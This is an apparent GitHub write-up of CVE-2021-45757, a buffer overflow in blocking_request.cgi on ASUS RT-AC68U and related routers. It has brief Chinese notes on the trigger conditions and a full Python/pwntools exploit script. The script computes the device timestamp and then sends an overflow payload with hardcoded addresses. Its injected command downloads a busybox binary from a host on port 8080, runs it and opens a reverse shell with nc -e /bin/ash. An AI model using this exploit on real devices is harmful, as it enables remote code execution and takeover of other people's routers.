Headline
CVE-2021-45757: GitHub - IBUILI/Asus
ASUS AC68U <=3.0.0.4.385.20852 is affected by a buffer overflow in blocking.cgi, which may cause a denial of service (DoS).
AC68U FirmwareVersion < 3.0.0.4.385.20633
RT-AC5300 FirmwareVersion <3.0.0.4.384.82072
. . . . . .
此漏洞影响多个路由器型号,具体型号暂未统计,官方2020年8-9月份修复的RCE漏洞(如下图)似乎就是这个
①系统时间+3600-atol(timestap参数)<20 (timestap参数:通过一次空包返回内容来计算时间戳(注意需要根据设备系统设置时区计算) 
②sub_11840函数为nvram_get,初始MULTIFILTER_MAC值为空,str("",mac),所以mac必须为空
#coding=utf-8
from pwn import *
import re
import time
import requests
import urlparse
import urllib3
urllib3.disable_warnings()
import sys
def rematch(strTmp):
tm_year = strTmp[0][2]
tm_month = strTmp[0][1]
tm_day = strTmp[0][0]
tm_hour = strTmp[0][3]
tm_min = strTmp[0][4]
tm_sec = strTmp[0][5]
if tm_month == 'Jan':
tm_month = '01'
if tm_month == 'Feb':
tm_month = '02'
if tm_month == 'Mar':
tm_month = '03'
if tm_month == 'Apr ':
tm_month = '04'
if tm_month == 'May':
tm_month = '05'
if tm_month == 'Jun':
tm_month = '06'
if tm_month == 'Jul':
tm_month = '07'
if tm_month == 'Aug':
tm_month = '08'
if tm_month == 'Sept':
tm_month = '09'
if tm_month == 'Oct':
tm_month = '10'
if tm_month == 'Nov':
tm_month = '11'
if tm_month == 'Dec':
tm_month = '12'
tm_hour = int(tm_hour) + 8 # +8对应时区
time_tmp = '{}-{}-{} {}:{}:{}'.format(tm_year, tm_month, tm_day, tm_hour, tm_min, tm_sec)
print(time_tmp)
ts = time.strptime(time_tmp, "%Y-%m-%d %H:%M:%S")
timeStamp= int(time.mktime(ts))
return timeStamp
def getTime(url):
scheme = urlparse.urlparse(url).scheme
hostname = urlparse.urlparse(url).hostname
header={
'Host': hostname,
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'Origin': scheme+'://'+hostname,
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Referer': scheme+'://'+hostname,
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection':'close'
}
data1 ={
'CName': '',
'mac': '',
'interval': '',
'timestap': '',
}
url = url+'/blocking_request.cgi'
ret = requests.post(url = url ,
headers = header,
data = data1,
verify=False)
format_time =''
for key, value in (ret.headers).items():
if 'Date' in key:
format_time = value
tmp = re.findall(r', (.*?) (.*?) (.*?) (.*?):(.*?):(.*?) GMT',format_time)
timeStap = rematch(tmp) + 3600
timeStapStr = str(timeStap)
print(timeStapStr)
data2 ={
'CName': 'cd /tmp/home/root;wget http://192.168.2.177:8080/busybox-armv6l;chmod 777 *;./busybox-armv6l nc 192.168.2.177:1234 -e /bin/ash',
'mac': '',
'interval': 'a'*12+p32(1)+'a'*16+p32(0x0000EFA8),
'timestap': timeStapStr +'a'*4740+p32(0x0006FE35), #p32(addr) 此addr为interval参数内容首地址
}
ret = requests.post(url = url ,
headers = header,
data = data2,
verify=False,)
print('End')
if __name__ == '__main__':
url = sys.argv[1]
getTime(url)